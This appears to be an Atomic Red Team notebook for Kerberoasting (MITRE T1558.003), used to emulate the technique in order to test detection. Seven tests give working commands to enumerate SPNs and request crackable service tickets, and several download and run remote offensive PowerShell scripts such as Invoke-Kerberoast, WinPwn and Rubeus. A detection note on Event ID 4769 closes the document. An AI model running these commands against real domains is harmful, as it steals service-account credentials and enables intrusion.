# T1558.003 - Kerberoasting
Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)

## Atomic Tests

### Atomic Test #1 - Request for service tickets
This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
when executed successfully , the test displays available services with their hashes. 
If the testing domain doesn't have any service principal name configured, there is no output

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 1

### Atomic Test #2 - Rubeus kerberoast
Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```
##### Description: Rubeus must exist

##### Check Prereq Commands:
```powershell
if(Test-Path -Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-Webrequest -Uri https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"

```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
klist purge
cmd.exe /c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" kerberoast None /outfile:"PathToAtomicsFolder\..\ExternalPayloads\rubeus_output.txt"
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\rubeus_output.txt" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Extract all accounts in use as SPN using setspn
The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. 
A successful execution will output all the SPNs for the related domain. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```cmd
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Write-Host Joining this computer to a domain must be done manually

```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
setspn -T %USERDNSDOMAIN% -Q */*
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 3

### Atomic Test #4 - Request A Single Ticket via PowerShell
The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. 
A successful execution will output the SPNs for the endpoint in question.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN" 
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 4

### Atomic Test #5 - Request All Tickets via PowerShell
The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. 
A successful execution will output the SPNs for the domain in question.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined

##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually

```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T %USERDNSDOMAIN% -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  
```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 5

### Atomic Test #6 - WinPwn - KerberoastingKerberoasting technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 6

### Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using RubeusPowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"```

In [ ]:
Invoke-AtomicTest T1558.003 -TestNumbers 7

## Detection
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)